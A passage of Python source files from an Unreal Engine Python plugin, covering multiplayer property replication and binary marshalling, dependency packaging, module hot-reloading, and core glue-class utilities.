the default value for that property. repProps from # parent classes are automatically folded into subclasses and do not need to be repeated. repProps = Bag() def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.nrNetID = None # unique ID for this object, set by calling bridge.Register. self.nrSpawnType = ENRSpawnReplicatedBy.App # who is in charge of replicating this object self.isHost = GetWorld().IsServer() # cached here since it doesn't change once code gets this far self.nrInitialStateSet = False # on clients, has initial state been received from the host? self.nrBeginPlayCalled = False # on all actors, has BeginPlay been called? self.nrOnReplicatedCalled = False # on all instances, has OnReplicated been called? self.nrDependencies = [] # list of (netID, attrName or '') of replicated objects this object depends on. Only set on host. self.nrWaitingDependencies = [] # netIDs of replicated objects this object is waiting on before OnReplicated will be called self.nrMixedSessionIDs = {} # method name -> mixed reliability session ID that is currently active # Generate the full set of replicated properties and set them to their defaults. By convention, properties # are referenced by index in alphabetical order, and no object can have more than 255 replicated properties. allProps = Bag() for klass in self.__class__.__mro__[::-1]: # reverse order so we start at the top of the MRO list allProps.update(**getattr(klass, 'repProps', {})) self.nrPropNames = sorted(allProps.keys()) # the official, ordered list of valid replicated property names for this object propInfo = {} # prop name -> Bag of info about it self.nr = Bag() # At some point we may make this a read-only struct so you have to use NRUpdate for i, propName in enumerate(self.nrPropNames): v = rawV = allProps[propName] if isinstance(v, NRWrappedDefault): v = v.defaultValue self.nr[propName] = v propInfo[propName] = Bag(index=i, type=type(v), default=v, rawDefault=rawV) self.nrPropInfo = propInfo # in case apps need to extract info for other purposes def NRRegister(self, netID, spawnType:ENRSpawnReplicatedBy): '''Registers this instance so that future messages to the given netID will be sent to it. Must be called in all scenarios (from __init__) *except* in NR-spawned instances on clients.''' if hasattr(self, 'engineObj') and self.engineObj.IsDefaultObject(): return # don't register if it's just the CDO _bridge.Register(self, netID, spawnType) def NRUnregister(self): '''Communicates to the replication system that this object will be cleaned up soon. For AActor subclasses, this call happens automatically via EndPlay.''' _bridge.Unregister(netID=self.nrNetID) def NRSetDependencies(self, *depInfos): '''Called on the host to declare that this object should not be considered fully replicated on clients until all of the listed objects have also fully replicated. Each item can be either a NetReplicated object instance or the name of a property on self that holds a ref to a NetReplicated object. In the latter case, once that object has replicated to a client, a reference to it will be set on self using that name.''' assert self.isHost deps = self.nrDependencies = [] # (netID, attrName or ''). These will be used by bridge.SendInitialStateFor. for d in depInfos: if isinstance(d, str): # The name of a property on self that references a NetReplicated object ref = getattr(self, d, None) assert ref is not None, 'NRSetDependencies cannot find property %r' % d assert isinstance(ref, NetReplicated), 'NRSetDependencies cannot depend on a non-replicated object: ' + repr((d, ref)) deps.append((ref.nrNetID, d)) else: assert isinstance(d, NetReplicated), 'NRSetDependencies cannot depend on a non-replicated object: ' + repr(d) deps.append((d.nrNetID, '')) def NRStartMixedReliability(self, methodName): '''Signals that the application code is going to have some unreliable message calls followed by a terminating reliable call. A recurring pattern in multiplayer stuff is to replicate some action from a user that involves a lot of updates, such as dragging an object around, and then letting go of it to drop the object somewhere. While the drag is happening, you want most players to get updates that that drag is happening, but those updates can be throttled & unreliable. When the user releases the object at its final location, you want to send a final, reliable message. Since the messages are all sent over UDP, it's possible for one of the intermediate messages to show up after the final message, which results in incorrect placement of the object. The solution is to call NRStartMixedReliability when the user begins the drag operation; we generate a small random ID for the (recipient, method) combination and include it with the messages. The receiving side then rejects any unreliable messages that use an invalid (or out of date) ID as a way to detect and prevent the above scenario.''' sessID = random.randint(1, 255) # 0=no active session, so pick [1..255] self.NRCall(ENRWhere.All, '_OnStartMixedReliability', methodName, sessID) def _OnStartMixedReliability(self, methodName, sessID): '''Receives word that a mixed reliability session (stream of unreliable messages followed by a final, reliable message) is starting''' self.nrMixedSessionIDs[methodName] = sessID def NRGetMixedReliabilitySessionID(self, methodName, reliable): '''Used by the bridge to get the current mixed reliability session ID for calls to the given method. Used for both sending messages (to know what session ID to include or 0 if none is active) and for receiving messages (to detect if an out of order unreliable message is being received after the final reliable message).''' sessID = self.nrMixedSessionIDs.get(methodName) if sessID is None: return 0 # no active session # if the message being sent or received is reliable, it signals the end of the mixed reliability session, so we should # remove the ID for use in future calls. if reliable: self.nrMixedSessionIDs.pop(methodName) return 0 return sessID def NRCall(self, where:ENRWhere, methodName, *args, reliable=True, maxCallsPerSec=-1): '''Performs a replicated call to one or more machines. To send a message to a specific user, use ENRWhere.Only(userID).''' _bridge.DoCall(self, where, methodName, args, reliable, maxCallsPerSec) def NRUpdate(self, where=ENRWhere.All, reliable=True, maxCallsPerSec=-1, **kwargs): '''Replicates an update to one or more replicated properties (to all machines by default). As a special case, if called from the constructor on the host, where is implicitly set to Local, as a way to override default values before the initial state is replicated to other machines.''' if where == ENRWhere.NONE or not kwargs: return # NRUpdate piggybacks on NRCall by sending a parameter that is a string holding a list of repprop indicces, then all the # values. We put the properties in order by their indices so that the same combination of parameters will use the same sigdef. propNames = [] # list of all the properties being updated pairs = [] # (propIndex, new value) invalidNames = [] for propName, value in kwargs.items(): propNames.append(propName) try: propIndex = self.nrPropNames.index(propName) pairs.append((propIndex, value)) except ValueError: invalidNames.append(propName) continue assert not invalidNames, 'NRUpdate called with one or more invalid property names: ' + repr(invalidNames) if not self.nrOnReplicatedCalled: # Probably just being called from the constructor on the host to override initial default values assert self.isHost # clients shouldn't try to override defaults since their state will be immediately overwritten by the initial state from the host assert where in (ENRWhere.All, ENRWhere.Local) for k,v in kwargs.items(): self.nr[k] = v elif where == ENRWhere.Local: # Special case but common enough that we want to handle it here: it's just a local update, so skip a whole bunch of extra work for k,v in kwargs.items(): setattr(self.nr, k, v) self.OnNRUpdate(propNames) else: indices = [] values = [] for propIndex, value in sorted(pairs): # put them in index order indices.append(str(propIndex)) values.append(value) indicesStr = '_'.join(indices) # At some point we could do like NRCall and combine the indicesStr with the method name so that it can be sent as a sigdef, # though it'd require NRCall to handle NRUpdate as a special case. self.NRCall(where, '_OnNRUpdate', indicesStr, *values, reliable=reliable, maxCallsPerSec=maxCallsPerSec) def _OnNRUpdate(self, indicesStr, *args): '''The receiving end of NRUpdate''' indices = [int(x) for x in indicesStr.split('_')] # indicesStr is a list of repprop indices in a _-separateed string like '2_5_10' propNames = [] for propIndex, value in zip(indices, args): # Convert the index to a prop name and update that property to its new value propName = self.nrPropNames[propIndex] propNames.append(propName) setattr(self.nr, propName, value) self.OnNRUpdate(propNames) def OnNRUpdate(self, modifiedPropNames): '''Called anytime an NRUpdate has happend on this object. Subclasses can override. Default implementation triggers and OnRep_* methods to be called.''' for name in modifiedPropNames: handler = getattr(self, 'OnRep_' + name, None) if handler: try: handler() except: logTB() def BeginPlay(self): '''(Used only on AActor subclasses)''' if self.nrSpawnType == ENRSpawnReplicatedBy.Engine and not self.isHost: # The NRRegister call made by app code on the client actually had no effect because we didn't know # our netGUID yet. But now that we've gotten this far, the engine has assigned us a netGUID, so we # can use it to register ourselves using the same unique name that happend for this instance on the host. _bridge.Register(self, self._nrDeferredNetID, ENRSpawnReplicatedBy.Engine) # The engine will start ticking actors as soon as BeginPlay has been called, but we want to prevent ticks until # OnReplicated, so override ticking for now. if issubclass(type(self.__class__), PyGlueMetaclass): self.engineObj.OverrideTickAllowed(False) super().BeginPlay() self.nrBeginPlayCalled = True self._NRCheckStart() def EndPlay(self, reason): # Note that EndPlay isn't called for non-engine subclasses, so in that case the app needs to call NRUnregister itself # (e.g. from __del__ or something) self.NRUnregister() super().EndPlay(reason) def _NRCheckStart(self): '''Called from various points of initialization to decide when it's time to call OnReplicated''' if not hasattr(self, 'nrNetID'): log('ERROR: object', self, 'failed to call NRRegister') return if self.nrOnReplicatedCalled: log('ERROR: _NRCheckStart called even though OnReplicated has already been called', self, self.nrNetID, Caller()) return if not self.isHost: if hasattr(self, 'engineObj') and not self.nrBeginPlayCalled: return # we're expecting a BeginPlay call that hasn't happened yet if not self.nrInitialStateSet: # See if the host has delivered our initial state self.nrInitialStateSet = gotIt = _bridge.TryConsumeInitialState(self) if not gotIt: return # we'll try again later # otherwise, fall thru if self.nrWaitingDependencies: return # still waiting on one or more dependent objects to fully replicate # We're good to go finally! self.nrOnReplicatedCalled = True # Allow ticking to happen (if the actor doesn't have ticks enabled, it still won't tick - it's now just allowed to tick # if it wants to) if issubclass(type(self.__class__), PyGlueMetaclass): self.engineObj.OverrideTickAllowed(True) try: self.OnReplicated() except: logTB() if self.isHost: # Now trigger replication of our state - we defer to here so that subclasses can do any further setup that they # want to do and to give them a chance to declare any replication dependencies _bridge.SendInitialStateFor(self) else: # Now that this object is fully replicated, objects that are depending on it can move forward _bridge.NoteObjectReplicated(self) # Stuff for marshalling objects over the wire. We use a single-character type code and then the data itself in some binary format. # The typecodes are combined into a format string so that they are not sent over and over, though in retrospect it adds a lot of complexity # for very little savings. Maybe in v3 we'll get rid of it! # struct packers for given types F_Float = struct.Struct('<f') # Note: technically we should use 'd' (8 bytes) because Python's floats seem to be closer to doubles in terms of precision F_Int = struct.Struct('<i') F_Short = struct.Struct('<H') F_FVector = struct.Struct('<fff') F_FVector2D = struct.Struct('<ff') F_FRotator = struct.Struct('<fff') F_FLinearColor = struct.Struct('<ffff') F_FTransform = struct.Struct('<fffffffff') F_FQuat = struct.Struct('<ffff') def ValueToBin(arg): '''Given a value to pass over the network, returns (typeCode, value)''' # Note: if you add more, (a) add it to ValuesToBin and (b) keep the type code to a single character if arg is None: return '0', b'' if isinstance(arg, bool): return 'B', struct.pack('?', arg) if isinstance(arg, float): return 'F', F_Float.pack(arg) if isinstance(arg, int): return 'I', F_Int.pack(arg) if isinstance(arg, str): return 'S', F_Short.pack(len(arg)) + arg.encode('utf8') if isinstance(arg, bytes): return 'y', F_Short.pack(len(arg)) + arg if isinstance(arg, FVector): return 'V', F_FVector.pack(*arg) if isinstance(arg, FVector2D): return 'v', F_FVector2D.pack(*arg) if isinstance(arg, FRotator): return 'R', F_FRotator.pack(*arg) if isinstance(arg, FLinearColor): return 'L', F_FLinearColor.pack(*arg) if isinstance(arg, type): className = arg.__name__ return 'C', F_Short.pack(len(className)) + className.encode('utf8') if isinstance(arg, FTransform): return 'T', F_FTransform.pack(*arg.GetLocation(), *arg.GetRotation(), *arg.GetScale3D()) if isinstance(arg, FQuat): return 'Q', F_FQuat.pack(*arg) if hasattr(arg, 'nrNetID'): return 'O', F_Int.pack(_bridge.NetIDNumFromObject(arg)) if isinstance(arg, UObject): # The object isn't replicated but it is an engine object, so assume it's an asset that has been loaded # by LoadByRef (though we should come up with some way to confirm this assumption), so generate and send a reference # path ref = GetReferencePath(arg) return 'A', F_Short.pack(len(ref)) + ref.encode('utf8') assert 0, 'Do not know how to marshall ' + repr((type(arg), arg)) def ValuesToBin(args): '''Given a list/tuple of args, returns (formatStr, binary blob)''' formatParts = [] blobParts = [] for arg in args: f,b = ValueToBin(arg) formatParts.append(f) blobParts.append(b) return ''.join(formatParts), b''.join(blobParts) def BinToValues(formatStr, blob): '''Inverse of ValuesToBin, returns a list of Python objects''' if not formatStr: return () ret = [] dataIndex = 0 # where in blob we're reading from next for typeCode in formatStr: if typeCode == '0': ret.append(None) # Do not increase dataIndex elif typeCode == 'B': ret.append(blob[dataIndex] != 0) dataIndex += 1 elif typeCode == 'F': ret.append(F_Float.unpack_from(blob, dataIndex)[0]) dataIndex += F_Float.size elif typeCode == 'I': ret.append(F_Int.unpack_from(blob, dataIndex)[0]) dataIndex += F_Int.size elif typeCode == 'S': sLen = F_Short.unpack_from(blob, dataIndex)[0] dataIndex += F_Short.size ret.append(str(blob[dataIndex:dataIndex+sLen], 'utf8')) dataIndex += sLen elif typeCode == 'y': bLen = F_Short.unpack_from(blob, dataIndex)[0] dataIndex += F_Short.size ret.append(bytes(blob[dataIndex:dataIndex+bLen])) dataIndex += bLen elif typeCode == 'V': ret.append(FVector(*F_FVector.unpack_from(blob, dataIndex))) dataIndex += F_FVector.size elif typeCode == 'v': ret.append(FVector2D(*F_FVector2D.unpack_from(blob, dataIndex))) dataIndex += F_FVector2D.size elif typeCode == 'R': ret.append(FRotator(*F_FRotator.unpack_from(blob, dataIndex))) dataIndex += F_FRotator.size elif typeCode == 'L': ret.append(FLinearColor(*F_FLinearColor.unpack_from(blob, dataIndex))) dataIndex += F_FLinearColor.size elif typeCode == 'C': sLen = F_Short.unpack_from(blob, dataIndex)[0] dataIndex += F_Short.size className = str(blob[dataIndex:dataIndex+sLen], 'utf8') dataIndex += sLen klass = NRTrackerMetaclass.All.get(className) assert klass is not None, 'BinToValues unable to find class ' + className ret.append(klass) elif typeCode == 'T': loc = FVector(*F_FVector.unpack_from(blob, dataIndex)) dataIndex += F_FVector.size rot = FRotator(*F_FRotator.unpack_from(blob, dataIndex)) dataIndex += F_FRotator.size scale = FVector(*F_FVector.unpack_from(blob, dataIndex)) dataIndex += F_FVector.size ret.append(FTransform(loc, rot, scale)) elif typeCode == 'Q': ret.append(FQuat(*F_FQuat.unpack_from(blob, dataIndex))) dataIndex += F_FQuat.size elif typeCode == 'O': # a reference to a replicated object netIDNum = F_Int.unpack_from(blob, dataIndex)[0] dataIndex += F_Int.size obj = _bridge.ObjectFromNetIDNum(netIDNum) if not obj: log('ERROR: BinToValues failed to find object for', repr(netIDNum)) ret.append(obj) elif typeCode == 'A': # reference path sLen = F_Short.unpack_from(blob, dataIndex)[0] dataIndex += F_Short.size ret.append(LoadByRef(str(blob[dataIndex:dataIndex+sLen], 'utf8'))) dataIndex += sLen else: assert 0, typeCode return ret
dfb/uepy
Content/Scripts/uepy/deps.py
<gh_stars>1-10 '''Manages installable dependencies - used both to package them and at runtime to make them available''' import os, shutil, zipapp, glob, sys def Package(): '''Called if you run deps.py from the command line, which you should do anytime you modify requirements.txt''' outName = 'deps.pyz' if os.path.exists(outName): os.remove(outName) tempDir = 'deps.tmp' if os.path.exists(tempDir): shutil.rmtree(tempDir) os.mkdir(tempDir) assert not os.system('pip install -r requirements.txt --target ' + tempDir) with open(os.path.join(tempDir, '__main__.py'), 'w') as f: f.write('print("hello")\n') zipapp.create_archive(tempDir, outName) shutil.rmtree(tempDir) def Discover(inDir): '''Finds any .pyz files and adds them to sys.path. This should be called on startup by main.py.''' libs = glob.glob(os.path.join(inDir, '*.pyz')) sys.path.extend(libs) return libs if __name__ == '__main__': Package()
dfb/uepy
Content/Scripts/sourcewatcher.py
''' Provides a development tool that monitors the source files used, reloading stuff when something changes. The developer provides a "dev module" that is used to set up the work area. Any module can opt-in to be informed about reloads by implementing any of: - OnModuleBeforeReload(watcher) - called right before the module is reloaded. Any value returned is state to be persisted across the reload. - OnModuleAfterReload(watcher, state) - called right after the reload; state is whatever was returned from OnModuleBeforeReload. The dev module *must* define a top-level variable called MODULE_SOURCE_ROOTS, a list of directory roots that should be monitored for file changes (well, only files actually used, matter, but it will restrict its observations to files in these trees). ''' import sys, ast, os, importlib, time, traceback # these get patched # TODO: use logging code from toolbox.utils def log(*args): print(' '.join(str(x) for x in args)) def logTB(): for line in traceback.format_exc().split('\n'): log(line) class ImportFinder(ast.NodeVisitor): def __init__(self): super().__init__() self.funcDepth = 0 # used to track if we're inside a function definition or not self.moduleNames = set() def visit_FunctionDef(self, node): self.funcDepth += 1 try: self.generic_visit(node) finally: self.funcDepth -= 1 def visit_Import(self, node): if self.funcDepth > 0: # Ignore inner imports as those often create cycles that are too hard to handle properly return for alias in node.names: self.moduleNames.add(alias.name) def visit_ImportFrom(self, node): if self.funcDepth > 0: # Ignore inner imports as those often create cycles that are too hard to handle properly return # Multiple cases here: # from module import submodule # from module import someVar # We assume all are modules and then later when we try to get them out of sys.modules, the ones that were just someVar # imports will be skipped over if node.module is not None: self.moduleNames.add(node.module) for alias in node.names: self.moduleNames.add(node.module + '.' + alias.name) @staticmethod def Scan(filename): '''Returns a list of module names that the given python file imports. Returns an empty list if the filename is None, is not a .py file, cannot be found, or has syntax errors.''' if not filename or not filename.lower().endswith('.py') or not os.path.exists(filename): return [] with open(filename) as f: src = f.read() f = ImportFinder() try: f.visit(ast.parse(src)) except: logTB() log('ERROR reading', filename) raise return list(f.moduleNames) class ModuleInfoTracker: '''Builds up a dependency graph of modules''' class ModuleInfo: def __init__(self, name, filename, isInSourceRoots): self.name = name self.iisr = isInSourceRoots self.savedState = None # returned from module's OnModuleBeforeReload self.imports = [] # ModuleInfo instances for modules this module directly imports self.importedBy = set() # ModuleInfo instances for modules that directly import this module f = self.filename = filename self.isAppSource = f and not f.endswith('.pyd') and isInSourceRoots # True if this module comes from a .py file and that file lives in one of the source roots self.UpdateLastMod() def UpdateLastMod(self): if self.filename and os.path.exists(self.filename): self.lastMod = os.path.getmtime(self.filename) def IsRoot(self): '''Returns True if this module is not imported by anyone else''' return not self.importedBy def IsLeaf(self): '''Returns True if this module imports no modules, or imports only builtin/system modules''' for m in self.imports: if m.isAppSource: return False return True def HasChanged(self): '''Returns True if the module file on disk has changed''' if not self.isAppSource: return False try: curLastMod = os.path.getmtime(self.filename) return curLastMod != self.lastMod except: return False # I guess? def CallModuleHook(self, name, *args): '''Calls the module's hook if it defines one, returning the result''' m = sys.modules.get(self.name) if m: cb = getattr(m, name, None) if cb: try: return cb(*args) except: logTB() return None def ReloadIfNeeded(self, watcher): reloaded = False if self.needsReload: self.savedState = self.CallModuleHook('OnModuleBeforeReload', watcher) m = sys.modules.get(self.name) if m: m = importlib.reload(m) # don't wrap this in a try/except block - we need an exception to bubble up if something is wrong self.UpdateLastMod() self.needsReload = False # so that other traversals of the dependency tree won't cause it to be loaded yet again reloaded = True self.CallModuleHook('OnModuleAfterReload', watcher, self.savedState) else: log('ERROR: can no longer find module', mi) return reloaded def __init__(self): self.Reset() def Reset(self, newSourceRoots=None): self.modules = {} # module.__name__ -> ModuleInfo self.sourceRoots = (newSourceRoots or [])[:] # we ignore modules not found in these directories or their children def SetSourceRoots(self, roots): self.sourceRoots = [os.path.abspath(x.strip()).lower().replace('\\','/') for x in roots] def _IsInSourceRoots(self, filename): '''Returns True if the given filename is in one of our source roots''' if not filename: return False f = os.path.abspath(filename).lower().strip().replace('\\','/') for src in self.sourceRoots: if f.startswith(src): return True return False def InfoFor(self, module): '''Returns the ModuleInfo for the given module, creating it (and the entries for any dependencies as needed)''' name = module.__name__ mi = self.modules.get(name) if mi is None: filename = getattr(module, '__file__', None) mi = ModuleInfoTracker.ModuleInfo(name, filename, self._IsInSourceRoots(filename)) self.modules[name] = mi # Kick off a check for all modules this module depends on if mi.isAppSource: for otherName in ImportFinder.Scan(mi.filename): otherModule = sys.modules.get(otherName) if not otherModule: continue otherMI = self.InfoFor(otherModule) mi.imports.append(otherMI) otherMI.importedBy.add(mi) return mi def MarkReloadModules(self, skipMarking=None): '''Sets .needsReload=T|F on any module based on whether or not each has changed or if any of its dependencies have changed. Returns the list of names of modules that need to be reloaded. if skipMarking is not None, it is a list of module names that can still be scanned but that should not be marked as needing a reload.''' rootMIs = [x for x in self.modules.values() if x.IsRoot()] reloadNames = [] scannedNames = [] for mi in rootMIs: reloadNames.extend(self._MarkReloadTree(mi, skipMarking or [], scannedNames)) return reloadNames # Note: this list may contain duplicates, even though we won't reload a module multiple times in one go def _MarkReloadTree(self, mi, skipMarking, scannedNames): if mi.name not in scannedNames: scannedNames.append(mi.name) reloadNames = [] needsReload = False for otherMI in mi.imports: if otherMI.name not in scannedNames: reloadNames.extend(self._MarkReloadTree(otherMI, skipMarking, scannedNames)) if getattr(otherMI, 'needsReload', False): needsReload = True mi.needsReload = (needsReload or mi.HasChanged()) and mi.name not in skipMarking if mi.needsReload: reloadNames.append(mi.name) return reloadNames def ReloadMarkedModules(self): '''Reload all modules marked by MarkReloadModules. Returns the names of modules that were reloaded, in order.''' # Find all root modules - the ones that are not imported by anyone else reloaded = [] rootMIs = [x for x in self.modules.values() if x.IsRoot()] processedMIs = [] for mi in rootMIs: reloaded.extend(self._ReloadTreeIfNeeded(mi, processedMIs)) return reloaded def _ReloadTreeIfNeeded(self, mi, processedMIs): '''Reloads any dependency modules if they have been marked as needing reload, then reloads this module if it has been flagged too.''' if mi in processedMIs: # prevent infinite recursion if modules depend on each other (e.g. via delayed / localfunc import) return [] processedMIs.append(mi) reloaded = [] for otherMI in mi.imports: if otherMI not in processedMIs: reloaded.extend(self._ReloadTreeIfNeeded(otherMI, processedMIs)) if mi.ReloadIfNeeded(self): reloaded.append(mi.name) return reloaded GLOBAL_NAME = '__global_source_watcher__' def GetGlobalInstance(): '''Returns the globally shared source watcher instance if it exists, else None''' return __builtins__.get(GLOBAL_NAME) class SourceWatcher: '''Monitors the source files for one or more classes, triggering an ordered reload when something changes''' def __init__(self, devModuleName='scratchpad', installGlobally=False): self.devModuleName = devModuleName # name of a module we'll import; this is the main module the developer uses as their work environment self.devModule = None # the actual module itself, once we've successfully imported it self.sourceRoots = [] # roots of directory trees that we'll monitor for changes to classes we're watching self.nextFirstLoadTry = 0 self.mit = ModuleInfoTracker() # In some scenarios, it's useful to have a global shared source watcher if installGlobally: if GetGlobalInstance(): log('WARNING: SourceWatcher told to install itself globally but one already exists (will overwrite it)') __builtins__[GLOBAL_NAME] = self def Cleanup(self): '''If the dev module is loaded, tries to call its before reload hook''' if self.devModule: mi = self.mit.InfoFor(self.devModule) mi.CallModuleHook('OnModuleBeforeReload', self) def UpdateSourceRoots(self): if self.devModule: self.sourceRoots = [os.path.abspath(x) for x in getattr(self.devModule, 'MODULE_SOURCE_ROOTS', [])] if not self.sourceRoots: log('WARNING: dev module did not provide MODULE_SOURCE_ROOTS') self.mit.SetSourceRoots(self.sourceRoots) def Check(self, skipDevModuleReload=False, forceDevModuleReload=False): '''Called frequently to see if anything has happened. If skipDevModuleReload is True, then it won't get reloaded even if changes have been detected. forceDevModuleReload does the opposite - it forces the dev module to be reloaded even if no changes have been detected. (both of these options are for working with PIE)''' try: # TODO: make handling of devModule less special-case and reduce duplication below for first load vs reload # If we've never successfully loaded the module before, try to do so but don't spin like crazy now = time.time() if (not skipDevModuleReload) and (forceDevModuleReload or (not self.devModule and now >= self.nextFirstLoadTry)): # We haven't even imported it yet, at least not successfully try: self.mit.Reset(self.sourceRoots) m = sys.modules.get(self.devModuleName) if m: self.devModule = importlib.reload(m) else: self.devModule = importlib.import_module(self.devModuleName) self.UpdateSourceRoots() mi = self.mit.InfoFor(self.devModule) mi.CallModuleHook('OnModuleAfterReload', self, mi.savedState) except ModuleNotFoundError: # Same as below, but don't log a noisy error self.devModule = None self.nextFirstLoadTry = time.time() + 1 return except: self.devModule = None self.nextFirstLoadTry = time.time() + 1 logTB() log('ERROR: failed to load dev module', self.devModuleName) return reloadNames = self.mit.MarkReloadModules([self.devModuleName] if skipDevModuleReload else None) if reloadNames: reloadNames = self.mit.ReloadMarkedModules() # reloadNames originally was provisional and could have had duplicates, now has the actual list of what was reordered self.mit.Reset(self.sourceRoots) log('Reloaded modules', reloadNames) if self.devModuleName in reloadNames: self.devModule = sys.modules[self.devModuleName] self.UpdateSourceRoots() if self.devModule: self.mit.InfoFor(self.devModule) except: logTB() self.devModule = None if __name__ == '__main__': sw = SourceWatcher('scratchpad') while 1: sw.Check() time.sleep(0.25)
dfb/uepy
Content/Scripts/uepy/__init__.py
from _uepy import * from importlib import reload import sys, shlex, json, time, weakref, inspect from . import enums # Capture sys.stdout/stderr class OutRedir: def write(self, buf): log(buf) def flush(self): pass def isatty(self): return False sys.stdout = OutRedir() sys.stderr = OutRedir() del OutRedir # some stuff for interactive __builtins__['reload'] = reload class Bag(dict): def __setattr__(self, k, v): self[k] = v def __getattr__(self, k): try: return self[k] except KeyError: raise AttributeError('No such attribute %r' % k) def __delattr__(self, k): try: del self[k] except KeyError: raise AttributeError('No such attribute %r' % k) @staticmethod def FromJSON(j): return json.loads(j, object_pairs_hook=Bag) def ToJSON(self, indent=0): if indent > 0: return json.dumps(self, indent=indent, sort_keys=True) return json.dumps(self) # The command line args passed to UE4, not including "sys.argv[0]" (the application) # NOTE: UE4 strips out quotes before it gets to any of our code, so pretty much anything with spaces in # it will not work - you have to escape%20your%20parameters, unfortunately. # TODO: stuff these into sys.argv? commandLineArgs = shlex.split(commandLineRaw) def GetWorld(): '''Returns the best guess of what the "current" world to use is''' WT = enums.EWorldType worlds = {} # worldType -> *first* world of that type for w in GetAllWorlds(): t = w.WorldType if worlds.get(t) is None: worlds[t] = w return worlds.get(WT.Game) or worlds.get(WT.PIE) or worlds.get(WT.Editor) def GetUserID(): '''Returns the session-unique user ID for the current user. User IDs are small integer values that are unique among the active users (i.e. if a client disconnects and a new client joins, it's possible that the new client will be assigned the old client's user ID).''' from . import netrep return netrep.GetUserID() class Event: '''Utility class for firing events locally among objects. Convention is for objects to declare a public event member variable that other objects access directly to add/remove listener callbacks. User Add/Remove to register/unregister a function to be called when the event owner calls event.Fire. The signature of the event is up to the owner and supports args and kwargs. Callbacks are weak referenced and it is not required to Remove a registered callback, but it must be owned by an object (the callback function object must be a method bound to an object).''' def __init__(self): self.callbacks = [] # list of (owner, cb method) def Add(self, method): self.callbacks.append(weakref.WeakMethod(method)) def Remove(self, method): for i, ref in enumerate(self.callbacks): if ref() == method: self.callbacks.pop(i) return log('ERROR: failed to remove', method) def Fire(self, *args, **kwargs): '''Called by the owner to emit an event''' for methodRef in self.callbacks[:]: cb = methodRef() if not cb: self.callbacks.remove(methodRef) else: # Special case: if the owner of the callback is a Python wrapper for an engine object, it's possible that the # underlying engine object is no longer valid, but the engine hasn't run GC yet, so the Python object still exists, # so we need to detect that scenario and not call the callback. engineObj = getattr(cb.__self__, 'engineObj', None) if engineObj and not engineObj.IsValid(): self.callbacks.remove(methodRef) continue try: cb(*args, **kwargs) except: logTB() def DestroyAllActorsOfClass(klass): for a in UGameplayStatics.GetAllActorsOfClass(GetWorld(), klass): a.Destroy() def FindGlueClass(klass): '''Given a class object, returns it if it is a glue class. Otherwise, recursively checks each of its base classes until it finds a glue class, and returns it. Otherwise, returns None.''' bases = klass.__bases__ for b in bases: # NOTE: if you reload(uepy) in the UE4 editor py console, this check will fail because you'll probably have multiple # versions of PyGlueMetaclass floating around - in that case, it's best to just restart UE4 for now. :( if type(b) is PyGlueMetaclass and b.__name__.endswith('_PGLUE'): return b # Keep looking for b in bases: g = FindGlueClass(b) if g is not None: return g return None _allGlueClasses = {} # class name -> each glue class that has been defined _allNonGlueClasses = {} # class name -> class object of all registered non-glue Python subclasses that extend engine classes def GetPythonEngineSubclasses(): return _allNonGlueClasses def GetAllGlueClasses(): return list(_allGlueClasses.values()) def MergedClassDefaults(klass): '''Recursively merges all klass.classDefaults into a single dict and returns them''' ret = {} for base in klass.__bases__[::-1]: ret.update(MergedClassDefaults(base)) ret.update(getattr(klass, 'classDefaults', {})) return ret class NRTrackerMetaclass(type): '''Tracks all subclasses of NetReplicated.''' # Note that not all NetReplicated objects are engine objects All = {} # class name --> class instance def __new__(metaclass, name, bases, dct): klass = super().__new__(metaclass, name, bases, dct) if bases: NRTrackerMetaclass.All[klass.__name__] = klass # don't use name that was passed in, as PyGlueMetaclass modifies it return klass MANGLE_CLASS_NAMES = True class PyGlueMetaclass(NRTrackerMetaclass): def __new__(metaclass, name, bases, dct): isGlueClass = not bases # (a glue class has no bases) # Each UClass in UE4 has to have a unique name, but with separate directories, we could potentially have # a naming collision. So internally we name each class <objectLib>__<class>, which should be # sufficiently unique. if MANGLE_CLASS_NAMES and not isGlueClass and not dct.get('_uepy_no_mangle_name'): moduleName = dct.get('__module__') if moduleName: name = moduleName.replace('.', '__') + '__' + name newPyClass = super().__new__(metaclass, name, bases, dct) if isGlueClass: _allGlueClasses[name] = newPyClass else: _allNonGlueClasses[name] = newPyClass # A glue class has no base classes, so this class is /not/ a glue class, so we need to find its glue class # so that we can automatically cast its engineObj when creating instances. pyGlueClass = FindGlueClass(newPyClass) assert pyGlueClass is not None, 'Failed to find py glue class for ' + repr((name, bases)) # We've found the Python side of the glue class, now get the C++ side as that's what we need to use to register # with the engine cppGlueClassName = pyGlueClass.__name__[:-6] + '_CGLUE' if MANGLE_CLASS_NAMES: cppGlueClassName = cppGlueClassName.split('__')[-1] cppGlueClass = getattr(glueclasses, cppGlueClassName, None) assert cppGlueClass, 'Failed to find C++ glue class for ' + repr((name, bases)) newPyClass.cppGlueClass = cppGlueClass # Register this class with UE4 so that BPs, the editor, the level, etc. can all refer to it by name interfaces = getattr(newPyClass, '__interfaces__', []) ec = newPyClass.engineClass = RegisterPythonSubclass(name, cppGlueClass.StaticClass(), newPyClass, interfaces) # Apply any CDO properties (in the py class's 'classDefaults' dict) if not hasattr(cppGlueClass, 'Cast'): log('WARNING: No Cast method found for', ec.GetName()) else: cdo = cppGlueClass.Cast(ec.GetDefaultObject()) for k, v in MergedClassDefaults(newPyClass).items(): try: setattr(cdo, k, v) except: logTB() log('Python class %s declares class default "%s" but setting the property failed' % (name, k)) return newPyClass def __call__(cls, engineObj, *args, **kwargs): # Instead of requiring every subclass to take an engineObj parameter and then pass it to some super.__init__ function, # we intercept it, strip it out, and set it for them. inst = object.__new__(cls) # Before calling the Python constructor, we need to make sure that the pyInst member is set on the C++ side, because # it's possible that the __init__ function calls some C++ function that in turn tries to call one of the Python # instance's methods. But in order for that to work, pyInst has to be set at that point. InternalSetPyInst(engineObj, inst) # engineObj is right now just a plain UObject pointer from pybind's perspective, but we want it to be a pointer to # the glue class. inst.engineObj = cls.cppGlueClass.Cast(engineObj) try: inst.__init__(*args, **kwargs) except: logTB() return inst def CPROPS(cls, *propNames): '''Creates Python read/write properties for C++ properties''' for _name in propNames: def setup(name): def _get(self): return getattr(self.engineObj, name) def _set(self, value): setattr(self.engineObj, name, value) setattr(cls, name, property(_get, _set)) setup(_name) # create a closure so we don't lose the name def BPPROPS(cls, *propNames): '''Creates Python read/write properties for BP (reflection system) properties''' for _name in propNames: def setup(name): def _get(self): return self.engineObj.Get(name) def _set(self, value): self.engineObj.Set(name, 